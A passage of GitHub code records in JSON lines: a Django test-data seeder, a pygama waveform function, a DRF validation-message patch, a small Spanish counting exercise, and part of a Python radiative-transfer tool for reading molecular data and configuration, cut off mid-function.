+{"seq_id":"23783434238","text":"from django.core.management.base import BaseCommand\nimport faker\nfrom django_seed import Seed\n\nfrom workers.models import CompanyStructure, Employees, SalaryInformation\n\n\nclass Command(BaseCommand):\n help = 'Заполнение БД тестовыми данными'\n\n def handle(self, *args, **options):\n fake = faker.Faker('ru_RU')\n seeder = Seed.seeder('ru_RU')\n\n if CompanyStructure.objects.count() < 5:\n y = (i for i in range(1, 6))\n seeder.add_entity(CompanyStructure, 5,\n {\n 'name': lambda x: fake.word(\n ext_word_list=('отдел', 'отделение', 'управление', 'цех', 'служба')),\n 'level_number': lambda x: next(y),\n }\n )\n\n seeder.add_entity(Employees, 10, {\n 'fullname': lambda x: fake.name(),\n 'position': lambda x: fake.job(),\n 'employment_date': lambda x: fake.date(),\n 'salary': lambda x: fake.pydecimal(positive=True, right_digits=2, max_value=2000),\n 'manager': lambda x: Employees.objects.last(),\n 'level': lambda x: CompanyStructure.objects.order_by(\"?\")[0],\n 'email': lambda x: fake.unique.email(),\n })\n\n seeder.add_entity(SalaryInformation, 100, {\n 'employee': lambda x: Employees.objects.order_by(\"?\")[0],\n 'paid_out': lambda x: fake.pydecimal(positive=True, right_digits=2, max_value=2000),\n 'date_paid': lambda x: fake.date(),\n\n })\n seeder.execute()\n","repo_name":"foreverYoungforeverDrunk/rd_site","sub_path":"workers/management/commands/db_seeder.py","file_name":"db_seeder.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"25297602863","text":"import numpy as np\nfrom numba import guvectorize\nfrom pygama.dsp.errors import DSPFatal\n\n@guvectorize([\"void(float32[:], float32, float32[:])\",\n \"void(float64[:], float64, float64[:])\"],\n \"(n),()->()\", nopython=True, cache=True)\ndef fixed_time_pickoff(w_in, t_in, a_out):\n \"\"\"\n Pick off the waveform value at the provided index. If the\n provided index is out of range, return NaN.\n\n Parameters\n ----------\n w_in : array-like\n The input waveform\n t_in : int\n The waveform index to pick off\n a_out: float\n The output pick-off value\n\n Processing Chain Example\n ------------------------\n \"trapEftp\": {\n \"function\": \"fixed_time_pickoff\",\n \"module\": \"pygama.dsp.processors\",\n \"args\": [\"wf_trap\", \"tp_0+10*us\", \"trapEftp\"],\n \"unit\": \"ADC\",\n \"prereqs\": [\"wf_trap\", \"tp_0\"]\n }\n \"\"\"\n a_out[0] = np.nan\n\n if np.isnan(w_in).any() or np.isnan(t_in):\n return\n\n if np.floor(t_in) != t_in:\n raise DSPFatal('The pick-off index must be an integer')\n\n if int(t_in) < 0 or int(t_in) >= len(w_in):\n return\n \n a_out[0] = w_in[int(t_in)]\n","repo_name":"emmaeline/pygama","sub_path":"pygama/dsp/_processors/fixed_time_pickoff.py","file_name":"fixed_time_pickoff.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"38"} +{"seq_id":"40038100863","text":"import base64\nimport marshal\n\nfrom django.core.exceptions import ValidationError as DjangoValidationError\nfrom rest_framework import request, fields\nfrom rest_framework.exceptions import ValidationError\n\nfrom .parsers import CamelCaseQueryStringParser\n\n\n# Patching rest_framework Request in order to allow querystring params camelcase conversion\n@property\ndef query_params(self):\n \"\"\"\n Camel case converter for querystring\n \"\"\"\n if not hasattr(self, '__query_params'):\n self.__query_params = CamelCaseQueryStringParser.parse(self._request)\n return self.__query_params\n\n\ndef patch_request():\n request.Request.patched_query_params = request.Request.query_params\n request.Request.query_params = query_params\n\n\n# Patching rest_framework Field, in order to intercept validation code for handling proper response output\ndef pack_validation_message(message, code, case=None, data=None):\n return base64.b64encode(marshal.dumps((str(message), code, case, data)))\n\n\ndef unpack_validation_message(packed_message):\n try:\n msg, code, case, data = marshal.loads(base64.b64decode(packed_message))\n return code, case, msg, data\n except (TypeError, base64.binascii.Error):\n return None, None, packed_message, None\n\n\ndef field_fail(self, key, **kwargs):\n \"\"\"\n Attaches extra validation code to the message\n \"\"\"\n try:\n self.patched_fail(key, **kwargs)\n except ValidationError as e:\n if isinstance(e.detail, list):\n e.detail = [pack_validation_message(m, key, getattr(e, 'case', None)) for m in e.detail]\n raise\n\n\ndef field_run_validators(self, value):\n \"\"\"\n Attaches extra validation code to the messages\n \"\"\"\n errors = []\n for validator in self.validators:\n if hasattr(validator, 'set_context'):\n validator.set_context(self)\n\n try:\n validator(value)\n except ValidationError as exc:\n if isinstance(exc.detail, dict):\n raise\n\n if isinstance(exc.detail, str):\n exc.detail = pack_validation_message(exc.detail,\n getattr(validator, 'code', None),\n getattr(exc, 'case', None))\n\n errors.extend(exc.detail)\n except DjangoValidationError as exc:\n errors.extend([pack_validation_message(m, exc.code) for m in exc.messages])\n if errors:\n raise ValidationError(errors)\n\n\ndef patch_base_field():\n fields.Field.patched_fail = fields.Field.fail\n fields.Field.fail = field_fail\n fields.Field.patched_run_validators = fields.Field.run_validators\n fields.Field.run_validators = field_run_validators\n","repo_name":"miphreal/drf-tweaks","sub_path":"drf_proj/apps/base_api/patch.py","file_name":"patch.py","file_ext":"py","file_size_in_byte":2733,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"15055032523","text":"pares=0\nimpares=0\nx=1\nn=int(input(\"cuantos numeros ingresados\"))\nwhile x<=n:\n valor=int(input(\"ingrese el valor\"))\n if valor%2==0:\n pares=pares+1\n else:\n impares=impares+1\n x=x+1\nprint(\"cantidad de pares\",pares)\nprint(\"cantidad de impares\",impares)\n\n \n \n \n","repo_name":"JuanesFranco/Fundamentos-De-Programacion","sub_path":"sesion-05/ejercicio 38.py","file_name":"ejercicio 38.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"12479123493","text":"import os, sys\nimport numpy as np\nfrom matplotlib.pylab import *\nimport pyopencl as cl\nimport pyopencl.array as cl_array\n#import healpy\nfrom scipy.interpolate import interp1d\nimport pickle\n## from MoleculeO import *\n\n\nC_LIGHT = 2.99792458e10\nAMU = 1.6605e-24 \nH_K = 4.799243348e-11\nBOLTZMANN = 1.3806488e-16\nSTEFAN_BOLTZMANN = 5.670373e-5\nPLANCK = 6.62606957e-27 \nGRAV = 6.673e-8\nPARSEC = 3.0857e18\nELECTRONVOLT = 1.6022e-12\nAU = 149.597871e11\nRSUN = 6.955e10\nMSUN = 1.9891e33\nARCSEC_TO_RADIAN = 4.8481368e-06\nARCSEC_TO_DEGREE = 1.0/3600.0\n\n\n\n\nclass MoleculeO: \n WEIGHT = 0.0\n TRANSITIONS = 0\n LEVELS = 0\n A = []\n B = [] \n BB = []\n E = []\n F = []\n G = []\n GG = []\n TRANSITION = []\n LEVEL = []\n NAME = ''\n PARTNERS = 0\n\n \n def L2T(self, upper, lower):\n \"\"\"\n Returns the index of the transition\n returns value<0 if not a valid transition\n NOTE: nothing can be assumed about the order in which transitions are\n stored in TRANSITION-array \n \"\"\"\n for tr in range(self.TRANSITIONS):\n if ((self.TRANSITION[tr,0]==upper)&(self.TRANSITION[tr,1]==lower)):\n return tr\n return -1 \n \n \n def T2L(self, tr):\n \"\"\"\n Return level indices (upper, lower) for the transition number tr\n Returns -1 if transition not found.\n \"\"\"\n if ((tr<0)|(tr>=self.TRANSITIONS)): return -1\n return self.TRANSITION[tr,:]\n \n \n def C(self, upper, lower, Tkin, partner):\n \"\"\"\n Return collision coefficient upper -> lower for given kinetic temperature Tkin and\n collision partner with index partner. Note, Tkin can be a vector.\n \"\"\"\n if (upper==lower): return 0.0\n if (partner>=self.PARTNERS):\n print(\"MoleculeO.C() called for partner %d, only %d partners exist\" % (partner, self.PARTNERS))\n c = self.CC[ partner] # collision coefficients upwards [:, ntkin]\n ul = self.CUL[ partner] # each row = (upper, lower), already with 0-offset values\n T = self.TKIN[partner] # Tkin array for this partner\n # the input file contains rates upper -> lower\n u, l = max([upper, lower]), min([upper,lower]) # real upper and lower\n m = nonzero((ul[:,0]==u)&(ul[:,1]==l)) # find the row in C array\n if (len(m[0])<1): return 0.0\n ip = interp1d(T, c[m[0][0],:]) # interpolation over temperature\n try:\n res = ip(clip(Tkin, T[0], T[-1]))\n except:\n print(\"MOL.C failed --- TKIN defined %.1f-%.1f\" % (T[0], T[-1]))\n print(Tkin)\n sys.exit()\n if (upper calculate based on stored downward rates\n # Clu = Cul gu/gl exp(-(Eu-El)/kT), l=\"upper\", u=\"lower\" !\n res *= (self.G[lower]/self.G[upper]) * np.exp(-H_K*(self.E[lower]-self.E[upper])/Tkin)\n return res\n \n \n def Read(self, filename):\n \"\"\"\n Read Lamda description of the molecule.\n \"\"\"\n fp = open(filename, 'r')\n fp.readline() # comment\n self.NAME = fp.readline().split()[0].replace(',','') # name\n fp.readline() # comment\n self.WEIGHT = float(fp.readline().split()[0]) # weight\n fp.readline() # comment\n self.LEVELS = int(fp.readline().split()[0]) # number of energy levels\n tmp = fp.readline() # comment\n d = loadtxt(fp, max_rows=self.LEVELS, usecols=(0,1,2)) # energy table\n self.G = asarray(d[:,2].copy(), float32)\n self.E = asarray(C_LIGHT*d[:,1], float32) # [Hz], for each level\n fp.readline() # comment\n self.TRANSITIONS = int(fp.readline().split()[0]) # number of transitions\n fp.readline() # comment\n d = loadtxt(fp, max_rows=self.TRANSITIONS, usecols=(0,1,2,3,4)) # Einstein A array\n d.shape = (self.TRANSITIONS, 5)\n self.TRANSITION = asarray(d[:,1:3], np.int32)-1\n self.A = asarray(d[:,3], float32)\n self.F = asarray(d[:,4]*1.0e9, float32)\n fp.readline() # comment\n self.PARTNERS = int(fp.readline().split()[0]) # number of collisional partners\n self.PNAME = []\n self.TKIN = []\n self.CC = []\n self.CUL = [] # for C array, upper and lower levels\n self.CABU = [] # abundances of collisional partners\n for ipartner in range(self.PARTNERS):\n print(\"**** READING MOLECULE PARTNER: %d !!!!!\" % ipartner)\n # one partner = one entry in { PNAME, TKIN, CUL, CC }\n fp.readline() # !COLLISIONS BETWEEN\n self.PNAME.append(fp.readline().split()[1]) # name ?\n fp.readline() # comment\n nc = int(fp.readline().split()[0]) # number of transitions\n fp.readline() # comment\n line = fp.readline()\n nt = int(line.split()[0]) # number of temperatures\n # can have optional abundance OF COLLISIONAL PARTNER after the temperature value !!!\n try:\n cabu = float(line.split()[1])\n self.CABU.append(cabu)\n except:\n if (1):\n self.CABU.append(1.0/self.PARTNERS)\n print(\"*** WARNING -- molecule file did not contain abundances of collisional\")\n print(\" partners, abundance set to %.3f !!!!!!!!!!!!!!!!!!!!!!!\" % (1.0/self.PARTNERS))\n fp.readline() # comment\n T = loadtxt(fp, max_rows=1) # Tkin vector\n self.TKIN.append(ravel(asarray(T, np.float32))) \n fp.readline() # comment\n d = loadtxt(fp, max_rows=nc) # the array\n if (len(d.shape)==1): d.shape = (1, len(d))\n self.CUL.append( asarray(d[:,1:3], np.int32)-1 ) # (upper, lower) --- zero offset values\n self.CC.append( asarray(d[:,3: ], np.float32)) # collisional coefficients\n # next line is again \"!COLLISIONS BETWEEN\"\n if (1):\n \"\"\"\n Kernel will later assume that *NTKIN is the same* for all collisional\n partners, although coefficients are interpolated independently for each partner.\n One could interpolate ipartner>0 coefficients for the TKIN grid of the\n first partner ipartner=0, but that would mean *two* linear interpolations with\n some loss of precision.\n Instead, we will just pad the arrays to have the same dimensions and have\n NTKIN equal to the maximum over the NTKIN values of individual partners.\n The collisional coefficient for the highest listed temperature is used to fill in \n the missing entries for the additional higher temperatures (hopefully those\n temperatures do not exist in the model!).\n \"\"\"\n new_ntkin = 0 \n for ipartner in range(self.PARTNERS): \n new_ntkin = max(new_ntkin, len(self.TKIN[ipartner]))\n print(\" partner %d has %d Tkin values\" % (ipartner, len(self.TKIN[ipartner])))\n # print(\"new NTKIN = %d\" % new_ntkin)\n # go through the data, pad self.TKIN[iparter] and self.CUL[ipartner] with\n # more temperatures, if necessary\n for ipartner in range(self.PARTNERS):\n n = len(self.TKIN[ipartner])\n if (n we assume that ipartner=0 has the necessary transitions and all\n self.CC[ipartner] arrays for ipartner>0 are rearranged to the same size and order.\n If this is not ok.... one should edit the molecule file before running LOC!\n \"\"\"\n # print(self.CC[1][:,0])\n for ipartner in range(1, self.PARTNERS):\n redo = False\n rows = self.CUL[0].shape[0]\n cols = len(self.TKIN[0])\n if (self.CUL[0].shape[0]!=self.CUL[ipartner].shape[0]): \n redo = True\n else: # check each transition\n for i in range(rows):\n if ((self.CUL[0][i][0]!=self.CUL[ipartner][i][0])|(self.CUL[0][i][0]!=self.CUL[ipartner][i][0])):\n redo = True\n if (redo==False): continue # nothing to do, partner lists the same transitions in the same order\n tmp = zeros((rows,cols), float32) # recreate the array of collisional coefficients for ipartner\n for i in range(rows):\n u, l = self.CUL[0][i,:] # new u->l for row i\n for j in range(self.CUL[ipartner].shape[0]):\n uu, ll = self.CUL[ipartner][j,:]\n if ((u==uu)&(l==ll)): # transition found also in the original array for ipartner\n tmp[i,:] = self.CC[ipartner][j,:]\n # note: if the transition u->l is not found for the current collisional partner ipartner,\n # the corresponding collisional coefficients in CC[] will remain zero\n break\n self.CUL[ipartner] = self.CUL[0].copy() # all partners now have the same transitions\n self.CC[ipartner] = tmp.copy() # in the same order\n # Each partner can still have different TKIN values but the number of TKIN values is the same\n # => kernel will use TKIN vector of each collisional partner separately\n print(\"\")\n print(\"================================================================================\")\n print(\" Molecule file has different temperature grids and/or different transitions\")\n print(\"listed for different collisional partners.\")\n print(\" In LOC calculations, all partners must have collisional coefficients defined\")\n print(\"for the *same transitions* and in the *same order* (as for the first partner).\")\n print(\"They also must have the *same number of Tkin values* although the actual\")\n print(\"Tkin values in the temperature grid can be different for different partners.\")\n print(\" The above is automatically fixed when LOC reads the molecule file. One could\")\n print(\"also consider converting the input molecule file to fulfill these conditions\")\n print(\"already before running LOC. This might be needed, for example, to deal with\")\n print(\"partially missing collisional coefficient (some collisional partner,\")\n print(\"some transitions), which are now by default simply set to zero.\") \n print(\"================================================================================\")\n print(\"\")\n time.sleep(2)\n # print(self.CC[1][:,0])\n # sys.exit()\n ###\n self.CABU = asarray(self.CABU, np.float32)\n # self.TKIN = asarray(self.TKIN, np.float32)\n self.Init()\n if (0):\n for t in range(self.TRANSITIONS):\n u, l = self.T2L(t)\n print(\" %2d -> %2d F= %12.4e E= %12.4e A= %12.4e\" % (u, l, self.F[t], self.E[u], self.A[t]))\n print(self.CUL[0])\n print(self.CC[0])\n sys.exit()\n \n \n def Partition(self, u, T):\n \"\"\"\n Return partition function value\n \"\"\"\n # if ((u<0)|(u>=self.LEVELS)): return 0.0\n return (self.G[u]*np.exp(-H_K*self.E[u]/T)) / sum(self.G[:]*np.exp(-H_K*self.E[:]/T))\n \n \n def Init(self):\n \"\"\"\n Precalculate GG, B, BB\n \"\"\"\n # GG\n self.GG = np.zeros(self.TRANSITIONS, np.float32)\n for tr in range(self.TRANSITIONS):\n u, l = self.T2L(tr)\n self.GG[tr] = self.G[u]/self.G[l]\n # B\n self.B = asarray( self.A*C_LIGHT*C_LIGHT/(2.0*PLANCK*double(self.F)**3.0) , float32 )\n # BB\n self.BB = self.GG * self.A * (C_LIGHT/self.F)**2.0 / (8.0*pi)\n\n\n \n def Transitions(self, levels):\n \"\"\"\n Update self.TRANSITION array so that it contains only transitions between levels < levels.\n \"\"\"\n print(\"Transitions(%d) from TRANSITIONS=%d\" % (levels, self.TRANSITIONS))\n # print(self.TRANSITION)\n ok = np.zeros(self.TRANSITIONS, np.int32)\n for i in range(self.TRANSITIONS): # loop over original array\n a, b = self.TRANSITION[i,:]\n if ((a0) # only these transitions remain\n # TRANSITION[], A[], and F[] may be truncated = higher levels dropped\n self.TRANSITION = asarray(self.TRANSITION[m[0],:], np.int32)\n self.A = asarray(self.A[m[0]], np.float32)\n self.B = asarray(self.B[m[0]], np.float32)\n self.BB = asarray(self.BB[m[0]], np.float32)\n self.F = asarray(self.F[m[0]], np.float32)\n self.TRANSITIONS = len(m[0]) # number of radiative transitions\n self.GG = np.zeros(self.TRANSITIONS, np.float32) # G indexed with level, GG with transition!\n for t in range(self.TRANSITIONS):\n u, l = self.T2L(t)\n self.GG[t] = self.G[u]/self.G[l]\n # print(\" %2d -> %2d F= %12.4e A= %12.4e\" % (u, l, self.F[t], self.A[t]))\n # Drop also higher levels... that would otherwise be included in partition function\n if (levels %d\" % self.TRANSITIONS)\n return self.TRANSITIONS\n \n \n \n##########################################################################################\n##########################################################################################\n \n\ndef Planck(F, T):\n return 2.0*PLANCK*((F/C_LIGHT)**2.0)*F / (np.exp((H_K*F/T))-1.0)\n\n\n\ndef ReadIni(filename):\n global PLANCK\n INI = {\n 'nside' : 1, # Healpix NSIDE parameter, to generate ray directions\n 'Tex' : [], # save excitation temperatures for listed transitions\n 'spectra' : [], # save spectra for listed transitions\n 'losspectrum' : 0, # contribution of LOS steps to one spectrum, 1=escaped, 2=emitted (no fg absorptions)\n 'direction' : [0.0, 0.0], # (theta, phi), the direction towards the observer\n 'points' : [10,10], # number pixels in the output maps\n 'cooling' : 0, # save cooling rates \n 'coolfile' : 'brute.cool',\n 'mapview' : [], # theta, phi, nx, ny, (x,y,z) map centre\n 'GPU' : 0 , # use GPU instead of CPU\n 'platforms' : [0,1,2,3,4], # OpenCL platforms to try\n 'idevice' : 0, # selected device within the platform (for given device type)\n 'sdevice' : '', # string used to select the OpenCL device\n 'load' : '', # file to load saved level populations\n 'save' : '' , # file to save calculated level populations\n 'iterations' : 1, # number of iterations (field simulation + level population updates)\n 'stop' : 1.0e-5, # stopping condition, based on relative change in level populations\n 'uppermost' : 999, # uppermost level to check in connection with 'stop'\n 'cabfile' : '', # abundance file for collisional partners\n 'constant_tkin' : 0, # assume constant Tkin for the whole model\n 'nray' : 64, # number of rays (1D models)\n 'alpha' : 1.0, # parameter to adjust placement of rays (1D models)\n 'nray_spe' : -1 , # number of rays to calculate spectra for (1D models)\n 'Tbg' : 2.72548, # background sky temperature\n 'hfsfile' : '', # file describing HFS line structure (HF components in LTE)\n 'with_crt' : 0 , # include CRT files (dust continuum absorption and emission)\n 'overlap' : '' , # include spectral overlap between lines\n 'lowmem' : 1, # choose some memory saving options for the kernels\n 'min_sigma' : 1e30, # minimum turbulent linewidth in the model\n 'max_sigma' : 0.0, # maximum turbulent linewidth in the model\n 'method_x' : 0, # not used\n 'LOCAL' : -1, # local work group size (overrides the program defaults)\n 'crttau' : 'crt.opacity', # name of the file for dust opacity\n 'crtemit' : 'crt.emission', # name of the file for dust emission\n 'cloud' : '', # name of the 'cloud', the file containing densities etc.\n 'octree' : 0, # the octree ray-tracing method chosen\n 'clsolve' : 1, # solve equilibrium equations on device instead on host\n 'offsets' : 1, # number of spatial ray offsets per surface element (default=1)\n 'pickle' : 1, # save this INI structure to all output files (1D models)\n 'WITH_ALI' : 1, # whether to use ALI (can be 0 for octree>=2)\n 'tausave' : 0, # save optical depths\n 'coldensave' : 0, # save total and molecular column density, mass-weighted LOS Tkin\n 'infallindex' : -1.0, # save map of infall index\n 'plweight' : 1, # include path-length weighting for octree4 (affects OT4 only)\n 'clip' : 0.0, # skip calculations when density below this threshold\n 'damping' : -1.0, # with ALI, dampen iterations is damping*old+(1-damping)*new\n 'dnlimit' : -1.0, # ni relative change > dnlimit => new = 0.5*old+0.5*new\n 'oneshot' : 0, # OCTREE=40, single kernel call to cover all rays (given side)\n 'thermaldv' : 1, # if >0, add thermal broadening, otherwise use file values as such\n 'kdensity' : 1.0, # scale volume densities\n 'ktemperature' : 1.0, # scale Tkin\n 'kabundance' : 1.0, # scale fractional abundance\n 'kvelocity' : 1.0, # scale macroscopic velocity\n 'ksigma' : 1.0, # scale microturbulence\n 'maxbuf' : 40, # maximum allocation of rays per root-grid ray\n 'WITH_HALF' : 0, # whether CLOUD is stored in half precision (vx, vy, vz, sigma)\n 'KILL_EMISSION' : 999999, # write spectra ignoring emission from cells >= KILL_EMISSION, 1D models only!!\n 'minmaplevel' : -1, # only hierarky levels level>minmaplevel used in map calculation\n 'MAP_INTERPOLATION': -1, # spatial interpolation in map making\n 'FITS' : 0, # if >0, save spectra and tau as FITS images\n 'FITS_RA' : 0.0, # centre coordinates (deg) of FITS maps\n 'FITS_DE' : 0.0, #\n 'verbose' : 1,\n 'doublecool' : 0, \n 'keys' : [] # store all keywords\n }\n lines = open(filename, 'r').readlines()\n for line in lines: \n s = line.split()\n if (len(s)<1): continue\n if ((line[0:1]=='#')|(s[0]=='#')): continue\n INI['keys'].append(s[0])\n \n if ((s[0].find('mapview')>=0)&(len(s)>=5)): # at least theta, phi, nx, ny -- optionally (xc, yc, zc)\n print(\"mapview, len(s)=%d\" % (len(s)), s)\n tmp = [ float(s[1])*pi/180.0, float(s[2])*pi/180.0, int(s[3]), int(s[4]) ] # theta, phi, NX, NY map parameters\n try:\n mc = [ float(s[5]), float(s[6]), float(s[7]) ] # map centre (xc, yc, zc)\n except:\n mc = [ NaN, NaN, NaN ] # these will be replaced by the default, the cloud centre\n pass\n # theta phi NX NY xc yc zc \n INI['mapview'].append([tmp[0], tmp[1], tmp[2], tmp[3], mc[0], mc[1], mc[2]])\n\n \n if (len(s)>2): # two float arguments\n try:\n a, b = float(s[1]), float(s[2])\n if (s[0].find('points')==0): INI.update({'points': [int(a), int(b)]})\n if (s[0].find('directi')==0): INI.update({'direction': [a*pi/180.0, b*pi/180.0]})\n except:\n pass \n if (len(s)>1): # keywords with one argument\n # spectra and transitions have several int arguments\n if ((s[0].find('spectra')==0)|(s[0].lower().find('tex')==0)|(s[0].find('transition')==0)):\n x = []\n for i in range(1, len(s)):\n try:\n a = int(s[i])\n x.append(a)\n except:\n break\n if (len(x)>0):\n x = asarray(x, np.int32)\n if (s[0].find('spectra')==0): INI.update({'spectra': x})\n if (s[0].lower().find('tex')==0): INI.update({'Tex': x}) \n if (s[0].find('transition')==0): INI.update({'Tex': x})\n if (s[0].find('octree')==0): \n INI.update({'cloud': s[1]})\n if (s[0].find('40')>0): INI['octree'] = 40\n elif (s[0].find('5')>0): INI['octree'] = 5\n elif (s[0].find('4')>0): INI['octree'] = 4\n elif (s[0].find('3')>0): INI['octree'] = 3\n elif (s[0].find('2')>0): INI['octree'] = 2\n elif (s[0].find('1')>0): INI['octree'] = 1\n else: INI['octree'] = 4 # 0 -> 4, default changed 2021-03-14\n print(\"*** OCTREE %d ***\" % INI['octree'])\n \n if (s[0].lower().find(\"fits\")==0): \n INI['FITS'] = 1 \n if (len(s)>2):\n INI['FITS_RA'] = float(s[1])\n INI['FITS_DE'] = float(s[2])\n \n if (s[0].find('cloud')==0): INI.update({'cloud': s[1]})\n if (s[0].find('molec')==0): INI.update({'molecule': s[1]})\n if (s[0].find('load')==0): INI.update({'load': s[1]})\n if (s[0].find('save')==0): INI.update({'save': s[1]}) # make sure tausave and save and not confused\n if (s[0].find('prefix')==0): INI.update({'prefix': s[1]})\n if (s[0].find('cabfile')==0): INI.update({'cabfile': s[1]})\n if (s[0].find('hfsfile')==0): INI.update({'hfsfile': s[1]})\n if (s[0].find('overlap')==0): INI.update({'overlap': s[1]}) \n if (s[0].find('crttau')==0): INI.update({'crttau': s[1]})\n if (s[0].find('crtemit')==0): INI.update({'crtemit': s[1]})\n if (s[0].find('device')==0):\n if (s[1].lower()=='c'): INI.update({'GPU': 0})\n elif (s[1].lower()=='g'): INI.update({'GPU': 1})\n else:\n INI.update({'sdevice': s[1]})\n ### 18-08-2021: now specifies a file name if the \"cooling\" keyword exists\n if (s[0].find('cooling')==0):\n INI.update({'cooling': 1})\n INI.update({'coolfile': s[1]})\n # float argument\n try:\n x = float(s[1])\n if (s[0].find(\"isotropic\")==0): INI.update({'Tbg': x})\n if (s[0].find(\"bandwidth\")==0): INI.update({'bandwidth': x})\n if (s[0].find(\"temperature\")==0): INI.update({'ktemperature':x})\n if (s[0].find(\"density\")==0): INI.update({'kdensity': x})\n if (s[0].find(\"fraction\")==0): INI.update({'kabundance': x})\n if (s[0].find(\"abundance\")==0): INI.update({'kabundance': x})\n if (s[0].find(\"velocity\")==0): INI.update({'kvelocity': x})\n if (s[0].find(\"sigma\")==0): INI.update({'ksigma': x})\n if (s[0].find(\"distance\")==0): INI.update({'distance': x})\n if (s[0].find(\"angle\")==0): INI.update({'angle': x})\n if (s[0].find(\"grid\")==0): INI.update({'grid': x})\n if (s[0].find(\"stop\")==0): INI.update({'stop': x}) \n if (s[0].find(\"alpha\")==0): INI.update({'alpha': x})\n if (s[0].find(\"clip\")==0): INI.update({'clip': x})\n if (s[0].find(\"damp\")==0): INI.update({'damping': x})\n if (s[0].find(\"dnlim\")==0): INI.update({'dnlimit': x})\n if (s[0].find(\"infallindex\")==0): INI.update({'infallindex': x})\n except:\n pass\n # int argument\n try:\n x = int(s[1])\n if (s[0].find(\"doublecool\")==0): INI.update({'doublecool': x})\n if (s[0].find(\"channels\")==0): INI.update({'channels': x})\n if (s[0].find(\"iterations\")==0): INI.update({'iterations': x})\n if (s[0].find(\"uppermost\")==0): INI.update({'uppermost': x})\n if (s[0].find(\"nside\")==0): INI.update({'nside': x})\n if (s[0].find(\"gpu\")==0): INI.update({'GPU': x})\n if (s[0].find(\"GPU\")==0): INI.update({'GPU': x})\n if (s[0].find(\"levels\")==0): INI.update({'levels': x})\n if (s[0].find(\"speray\")==0): INI.update({'nray_spe': x})\n if (s[0].find(\"nray\")==0): INI.update({'nray': x}) \n if (s[0].find('offsets')==0): INI.update({'offsets': x})\n if (s[0].find('lowmem')==0): INI.update({'lowmem': x})\n if (s[0].find('clsolve')==0): INI.update({'clsolve': x}) \n if (s[0].find('LOCAL')==0): INI.update({'LOCAL': x})\n if (s[0].find('local')==0): INI.update({'LOCAL': x})\n if (s[0].find(\"ALI\")==0): INI.update({'WITH_ALI': x})\n if (s[0].find(\"ali\")==0): INI.update({'WITH_ALI': x})\n if (s[0].find(\"fits\")==0): INI.update({'FITS': x})\n if (s[0].find(\"verbose\")==0): INI.update({'verbose': x})\n if (s[0].find(\"tausave\")==0): INI.update({'tausave': x})\n if (s[0].find(\"colden\")==0): INI.update({'coldensave': x})\n if (s[0].find(\"plweight\")==0): INI.update({'plweight': x})\n if (s[0].find(\"oneshot\")==0): INI.update({'oneshot': x})\n if (s[0].find(\"thermaldv\")==0): INI.update({'thermaldv': x})\n if (s[0].find(\"maxbuf\")==0): INI.update({'maxbuf': x})\n if (s[0].find(\"half\")==0): INI.update({'WITH_HALF': x})\n if (s[0].find(\"killemi\")==0): INI.update({'KILL_EMISSION': x}) # kill all emission from cells>x, 1D models only!!\n if (s[0].find('minmaplevel')==0): INI.update({'minmaplevel' : x})\n if (s[0].find(\"mapint\")==0): INI.update({'MAP_INTERPOLATION': x})\n if (s[0].find('losspec')==0): INI.update({'losspectrum': x}) # 1=escaped (observed) radiation, 2=emitted radiation without foreground absorption \n if (s[0].find(\"platform\")==0): \n INI.update({'platforms': [x,]})\n if (len(s)>2): # user also specifies the device within the platform\n try:\n INI.update({'idevice': int(s[2])})\n except:\n idevice = 0\n except:\n pass \n # keywords without arguments\n if (s[0].find('cool')==0): INI.update({'cooling': 1})\n if (s[0].find('constant_tkin')==0): INI.update({'constant_tkin': 1})\n if (s[0].find('crtdust')==0): INI.update({'with_crt': 1})\n if (s[0].find('pickle')==0): INI.update({'pickle': 1})\n if (s[0].find('methodx')==0): INI.update({'method_x': 1})\n # if (s[0].find('losspec')==0): INI.update({'losspectrum': 1}) # 1=escaped radiation, 2=emitted radiation without foreground absorption\n #if (s[0].find(\"FITS\")==0): INI.update({'FITS': 1})\n #if (s[0].find(\"fits\")==0): INI.update({'FITS': 1})\n \n # one can use \"direction\" and \"points\", map centred on the cloud centre\n # if mapview is given, direction and points will be ignored\n if (len(INI['mapview'])<1):\n # theta phi nx ny xc yc zc \n INI['mapview'].append(\n [INI['direction'][0],INI['direction'][1],INI['points'][0],INI['points'][1], NaN, NaN, NaN])\n # some allocations depend on map size => update INI['points'] with the maximum values\n max_nra, max_nde = 0, 0\n for i in range(len(INI['mapview'])):\n max_nra = max(max_nra, INI['mapview'][i][2])\n max_nde = max(max_nde, INI['mapview'][i][3])\n INI['points'] = [ max_nra, max_nde]\n # INI['direction'] is no longer needed\n INI['direction'] = []\n return INI\n\n\n\ndef ReadMolecule(molname):\n \"\"\"\n Read molecule\n \"\"\"\n MOL = MoleculeO()\n if (os.path.exists(molname)):\n MOL.Read(molname)\n else:\n MOL.Read('%s/%s' % ('/home/mika/tt/MOL/', molname))\n return MOL\n\n\n\ndef ReadCloudOT(INI, MOL):\n \"\"\"\n Read and rescale an octree cloud.\n Usage:\n RHO, TKIN, CLOUD, ABU, CELLS, OTL, LCELLS, OFF, NX, NY, NZ = ReadCloudOT(INI, MOL)\n Return:\n RHO[cells], vector of volume densities\n TKIN[cells], vector of kinetic temperatures\n CLOUD[cells], float4 ~ [vx, vy, vz, sigma], sigma = line width\n ABU[cells], vector of abundances\n CELLS, total number of cells\n OTL, number of levels in the octree hierarchy\n OFF, offsets within a parameter vector to the first entry on a level of hierarchy\n NX, NY, NZ, dimensions of the root grid\n File format:\n NX, NY, NZ, OTL, CELLS = dimensions (x, y, z), number of levels (OTL), number of cells\n this is followed by data for rho[], T[], sigma[], vx[], vy[], vz[], ABU[] ;\n each of these vectors consist of:\n lcells0, vector0, lcells1, vector1, ...\n i.e. number of cells on the hierarchy level and the values for the cells on that\n hierarchy level.\n The cloud hierarchy is defined by rho[], values <=0.0 are links to child cells.\n For sigma, use convention of having values <-1e10 for cells other than leaf nodes\n Could use the same for (vx, vy, vz).\n In addition tho WHO, we could have actual links as part of the parameters vectors only \n for TKIN and sigma...\n \"\"\"\n fp = open(INI['cloud'], 'rb')\n NX, NY, NZ, OTL, CELLS = fromfile(fp, int32, 